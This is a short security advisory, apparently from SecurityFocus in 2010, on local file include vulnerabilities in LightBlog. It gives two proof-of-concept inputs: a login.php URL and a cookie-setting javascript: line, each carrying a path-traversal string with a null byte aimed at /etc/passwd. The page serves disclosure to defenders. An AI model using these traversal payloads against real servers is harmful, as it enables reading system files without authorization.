LightBlog Multiple Local File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URI is available:

http://www.example.com/login.php?username_post=../../../../../../../../../../etc/passwd%00

The following example code is available:

javascript:document.cookie = "Lightblog_username=../../../../../../../../../../etc/passwd%00; path=/";


 

Privacy Statement
Copyright 2010, SecurityFocus